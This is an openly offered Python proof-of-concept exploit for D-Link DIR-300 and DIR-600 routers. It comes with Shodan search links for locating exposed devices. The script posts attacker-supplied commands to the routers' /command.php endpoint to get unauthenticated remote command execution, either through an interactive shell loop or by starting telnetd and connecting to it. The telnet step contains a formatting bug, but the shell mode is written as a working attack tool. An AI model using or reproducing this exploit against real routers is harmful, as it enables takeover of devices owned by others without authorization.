|
#!/usr/bin/python
# D-LINK TOTAL FAIL
# http://www.s3cur1ty.de/m1adv2013-003
# Another Shit PoC by infodox
# SHODANS BELOW
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600
# Who knew a shell could be so easy?
import sys
import requests
import os
if len(sys.argv) != 3:
print "Usage: ./dlinkroot.py <target> <mode>"
print "Modes: shell or telnetenable"
print "I was lazy so I assume you have a telnet client"
sys.exit(0)
target = sys.argv[1]
mode = sys.argv[2]
def shell(target):
print "[+] Connecting and spawning a shell..."
while True:
try:
bobcat = raw_input("%s:~# " %(target))
lulz = "cmd=%s;" %(bobcat)
url = "http://" + target + "/command.php"
hax = requests.post(url, lulz)
print hax.text
except KeyboardInterrupt:
print "\n[-] Quitting"
sys.exit(1)
def telnetenable(target):
lulz = "cmd=telnetd;"
url = "http://" + target + "/command.php"
print "[+] Trying to enable telnet"
try:
hax = requests.post(url, lulz)
print hax.text
except Exception:
print "[-] IT FAILED IT!"
sys.exit(0)
print "[+] Doing a telnet"
try:
os.system('telnet %s') %(target)
except Exception:
print "[-] IT FAILED IT!"
sys.exit(1)
if mode == "shell":
shell(target)
elif mode == "telnetenable":
telnetenable(target)
else:
print "[:(] WHAT THE FUCK YOU'RE DOING IT WRONG!"
|